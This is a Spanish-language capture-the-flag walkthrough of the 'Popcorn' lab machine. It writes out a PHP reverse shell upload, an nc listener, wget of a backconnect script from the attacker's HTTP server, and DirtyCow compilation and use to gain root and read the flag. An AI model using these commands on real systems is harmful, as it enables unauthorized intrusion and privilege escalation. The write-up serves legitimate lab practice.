Está es mi primer box con dificultad media.

1 probe.

Del nombre popcorn al principio no encontre nada pero despues de usar dirbuster con la lista chica (creo) sin recursive porque si no se hace eterno encontre una carpeta que se llama torrent. Supuse que necesitas palomitas para ver los torrents y es por eso que así se llama la maquina.

Si corremos el dirbuster en la carpeta torrent podemos ver la carpeta de uploads.

Dando un poco de vueltas en la página podemos ver que hay forma de subir un “screenshot” y se aloja en la carpeta upload. Es decir si pudieramos subir un php shell podriamos ser shell y ser felices.

Aquí hay dos opciones

1 subir la reverse shell que esta en /usr/share/webshells/php/php-reverse-shell.php y poner un listener

root@kali:~# nc -nvlp 9090

2 subir una shell completita https://github.com/flozz/p0wny-shell

y ya podemos buscar la flag de user.

Para la flag de root.

aqui empieza la bueno, la shell ahí me daba problemas porque no podiar correr dirtycow dicho esto. lo que hice fue subir un tcp_backconect luego empece el shell handler.

Lo que tiene que hacer es, en tu host hacer un servidor

python -m SimpleHTTPServer 8001

o ponerlo ahí de alguna manera.

editar el backoneect y bajarlo 

wget http://10.10.14.9:8001/tcp_pty_backconnect.py

encender el lsitener donde el IP es el de la maquina donde quieres la consola osea tu ln0 el puerto que editaste y -b que no tiene sentido pero asi es…

root@kali:/usr/share/python-pty-shells-master# python tcp_pty_shell_handler.py 10.10.14.9:9091 -b

y tienes la consola

una vez hecho esto ahora tocó dirtycow (que tarda mucho, no se desesperen)

para usar por ejemplo la verción de c (dirty.c)

checas que este instalado gcc

which gcc

lo subes con httpserver

lo compilas y lo haces ejecutable

gcc -pthread dirty.c -o dirty -lcrypt
chmod +x dirty.c
./dirty
su firefart

firefart es el nuevo usuario

www-data@popcorn:/dev/shm$ su firefart
Password: 
firefart@popcorn:/dev/shm# whoami
firefart
firefart@popcorn:/dev/shm# locate root.txt
/root/root.txt
firefart@popcorn:/dev/shm# cat /root/root.txt
f122331023a9.....

 

y ya